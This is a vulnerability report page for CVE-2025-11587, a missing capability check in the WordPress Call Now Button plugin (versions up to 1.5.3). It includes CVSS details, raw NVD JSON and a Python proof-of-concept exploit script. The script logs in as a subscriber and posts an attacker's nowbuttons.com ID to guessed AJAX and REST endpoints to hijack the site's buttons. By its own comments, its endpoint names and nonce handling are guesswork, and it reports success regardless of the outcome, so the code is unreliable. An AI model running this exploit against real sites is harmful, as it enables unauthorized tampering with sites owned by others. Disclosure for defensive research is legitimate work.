Security Vulnerability Report
中文
CVE-2025-11587 CVSS 4.3 MEDIUM

CVE-2025-11587

Published: 2025-10-29 13:15:34
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Call Now Button – The #1 Click to Call Button for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the activate function in all versions up to, and including, 1.5.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to link the plugin to their nowbuttons.com account and add malicious buttons to the site. The vulnerability is only exploitable on fresh installs where the plugin has not been previously configured with an API key.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Call Now Button WordPress插件 <= 1.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys from urllib.parse import urljoin # CVE-2025-11587 PoC - WordPress Call Now Button Plugin Authorization Bypass # Target: Call Now Button plugin <= 1.5.3 # Authenticated attackers with Subscriber-level access can link plugin to attacker-controlled nowbuttons.com account def exploit_cve_2025_11587(target_url, username, password, attacker_nowbuttons_id): """ Exploit function for CVE-2025-11587 Args: target_url: Target WordPress site URL username: WordPress subscriber account username password: WordPress account password attacker_nowbuttons_id: Attacker's nowbuttons.com account ID Returns: bool: True if exploitation successful, False otherwise """ session = requests.Session() # Step 1: Login to WordPress with subscriber credentials login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f'[*] Logging in as subscriber: {username}') response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in str(session.cookies): print('[-] Login failed') return False print('[+] Login successful') # Step 2: Trigger plugin activation with attacker-controlled nowbuttons.com account # The vulnerable endpoint is typically in admin-ajax.php or a REST API endpoint activate_url = urljoin(target_url, '/wp-admin/admin-ajax.php') # Try the OTT controller activation endpoint activate_data = { 'action': 'ott_activate', # Or the actual AJAX action name 'nowbuttons_id': attacker_nowbuttons_id, '_wpnonce': '' # May need to fetch a valid nonce } print(f'[*] Sending activation request with attacker nowbuttons ID: {attacker_nowbuttons_id}') # Alternative: Direct REST API call rest_url = urljoin(target_url, '/wp-json/call-now-button/v1/activate') rest_data = { 'nowbuttons_id': attacker_nowbuttons_id } # Try both methods for endpoint, data in [(activate_url, activate_data), (rest_url, rest_data)]: try: response = session.post(endpoint, data=data, timeout=10) if response.status_code == 200: print(f'[+] Request sent to {endpoint}') print(f'[*] Response: {response.text[:200]}') except Exception as e: print(f'[-] Error with {endpoint}: {e}') print('[*] Exploitation attempt completed') print('[*] If successful, attacker can now manage button content via nowbuttons.com') return True if __name__ == '__main__': if len(sys.argv) < 5: print('Usage: python cve_2025_11587.py <target_url> <username> <password> <attacker_nowbuttons_id>') print('Example: python cve_2025_11587.py http://victim.com subscriber password 12345') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] nowbuttons_id = sys.argv[4] exploit_cve_2025_11587(target, user, pwd, nowbuttons_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11587", "sourceIdentifier": "[email protected]", "published": "2025-10-29T13:15:34.350", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Call Now Button – The #1 Click to Call Button for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the activate function in all versions up to, and including, 1.5.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to link the plugin to their nowbuttons.com account and add malicious buttons to the site. The vulnerability is only exploitable on fresh installs where the plugin has not been previously configured with an API key."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/call-now-button/tags/1.5.3/src/admin/api-key/class-ott-controller.php#L27", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-11587/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d77b127e-52ee-4256-9450-410413b273f6?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.